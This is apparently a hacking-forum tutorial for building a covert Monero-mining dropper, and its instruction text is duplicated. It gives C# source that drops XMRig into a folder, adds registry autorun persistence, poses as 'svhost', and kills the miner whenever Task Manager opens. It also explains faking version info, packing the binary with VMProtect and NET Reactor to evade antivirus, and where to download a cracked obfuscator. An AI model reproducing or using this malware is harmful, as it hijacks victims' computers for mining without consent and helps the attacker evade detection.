For a better understanding of the following code, you need basic knowledge in C #!
Let's start:
Download the latest version of Xmrig's style (github.com/xmrig/xmrig/releases).
Next we need only xmrig.exe
Download and install Resource Hacker (angusj.com/resourcehacker/#download)
Go to the directory C:\Windows\System32, select any dll and open with Resource Hacker.
Next, copy the text from Version Info
Press on button Compile
Press Ctrl + S to save everything
There are 2 files xmrig.exe and xmrig_original.exe, the second we no longer come in handy
Then we need to crypt somehow our file if you have no money to buy private crypt just google VMProtector and try to crypt it with this programm. Should help at least to FUD 1 - 5 /36
The miner is ready!
Now you need to make a bot that will open and close the miner.
In Visual Studio, we create a new console application C #
Go to Project -> Properties ..., in the Application section, change the Output type to Windows Application
In the Resources section, add our miner - MSASCuiL
Thus, we make our program invisible and add the miner to the resources
Then paste the following code:
Change the settings to your
We compile our program and do the same with it as c xmrig (change Version Info)
Since this is a NET program I recommend using NET Reactor
My settings:
It is better to name the file svhost and do not change the icon so that the file is not highlighted through other processes svhost
ALL IS READY!!!
In the end we get the file svchost
If you start it in folder, it ll drop 2 files and start the mining
If you open the task manager, the mining will stop
Detect svhost - https://nodistribute.com/result/GZfSC9vh...5uKkcUrXHP
Detect MSASCuiL - https://nodistribute.com/result/pG8eDqwBVjJWY2AuXk5Sny
Link to NET Reactor:
https://files.catbox.moe/u8ibxh.zip
Pass to archive: lzt
VT: https://www.virustotal.com/#/file/1efc53.../detection
Let's start:
Download the latest version of Xmrig's style (github.com/xmrig/xmrig/releases).
Next we need only xmrig.exe
Download and install Resource Hacker (angusj.com/resourcehacker/#download)
Go to the directory C:\Windows\System32, select any dll and open with Resource Hacker.
Next, copy the text from Version Info
Press on button Compile
Press Ctrl + S to save everything
There are 2 files xmrig.exe and xmrig_original.exe, the second we no longer come in handy
Then we need to crypt somehow our file if you have no money to buy private crypt just google VMProtector and try to crypt it with this programm. Should help at least to FUD 1 - 5 /36
The miner is ready!
Now you need to make a bot that will open and close the miner.
In Visual Studio, we create a new console application C #
Go to Project -> Properties ..., in the Application section, change the Output type to Windows Application
In the Resources section, add our miner - MSASCuiL
Thus, we make our program invisible and add the miner to the resources
Then paste the following code:
Code:
using Microsoft.Win32;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Threading;
namespace ConsoleApp4
{
class Program
{
static string direct = @"C:\TEST2"; //Путь к папке, где будут храниться все файлы
static string _filename = "MSASCuiL"; //Название майнера
static string proc = "50";//нагрузка на CPU
static string pool = "stratum+tcp://miner.xyz:3333"; // Pool
static string user = "123"; //User
static string filename = _filename+".exe";
static string exeToRun = direct + @"\" + filename;
const string name = "HdDriver";
static string ExePath = "";
static void Main(string[] args)
{
Install(); //Копируем файлы Майнера в папку
CopyFile(); //Копируем файлы бота в папку
SetAutorunValue(true);//Делаем автозапуск (взяв з https://lolzteam.net/threads/345524/)
StartMine(); //Запускаем майнер
while (true) //Мониторим процессы, если диспетчер задач открытый закрываем майнер
{
int con = 0;
Process[] procs = Process.GetProcesses();
foreach (Process p in procs)
{
if (p.ProcessName == "Taskmgr")
{
Process[] miner = Process.GetProcessesByName(_filename);
if (miner.Length > 0)
{
miner[0].Kill();
}
con++;
}
}
if (con == 0)
{
Process[] miner1 = Process.GetProcessesByName(_filename);
if (miner1.Length == 0)
{
StartMine();
}
}
Thread.Sleep(500);
}
}
private static void StartMine()
{
Process run = new Process();
run.StartInfo.Arguments = $" --max-cpu-usage={proc} --donate-level=1 -o {pool} -u {user} ";
run.StartInfo.FileName = exeToRun;
run.StartInfo.RedirectStandardOutput = true;
run.StartInfo.UseShellExecute = false;
run.StartInfo.CreateNoWindow = true;
run.Start();
}
public static void CopyFile()
{
if (!File.Exists(direct+@"\"+"svhost.exe"))
{
string filePath = Assembly.GetExecutingAssembly().Location;
File.Copy(filePath, direct + @"\" + "svhost.exe");
}
}
public static bool SetAutorunValue(bool autorun)
{
if(!File.Exists(direct + @"\" + "svhost.exe"))
{
ExePath = Assembly.GetExecutingAssembly().Location;
}
else
{
ExePath = direct + @"\" + "svhost.exe";
}
RegistryKey reg;
reg = Registry.CurrentUser.CreateSubKey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\");
try
{
if (autorun)
reg.SetValue(name, ExePath);
else
reg.DeleteValue(name);
reg.Close();
}
catch
{
return false;
}
return true;
}
private static void Install()
{
byte[] exeBytes = Properties.Resources.MSASCuiL;
if (!Directory.Exists(direct))
{
Directory.CreateDirectory(direct);
}
if (!File.Exists(exeToRun))
{
using (FileStream exeFile = new FileStream(exeToRun, FileMode.Create))
{
exeFile.Write(exeBytes, 0, exeBytes.Length);
}
}
}
}
}
Change the settings to your
We compile our program and do the same with it as c xmrig (change Version Info)
Since this is a NET program I recommend using NET Reactor
My settings:
It is better to name the file svhost and do not change the icon so that the file is not highlighted through other processes svhost
ALL IS READY!!!
In the end we get the file svchost
If you start it in folder, it ll drop 2 files and start the mining
If you open the task manager, the mining will stop
Detect svhost - https://nodistribute.com/result/GZfSC9vh...5uKkcUrXHP
Detect MSASCuiL - https://nodistribute.com/result/pG8eDqwBVjJWY2AuXk5Sny
Link to NET Reactor:
https://files.catbox.moe/u8ibxh.zip
Pass to archive: lzt
VT: https://www.virustotal.com/#/file/1efc53.../detection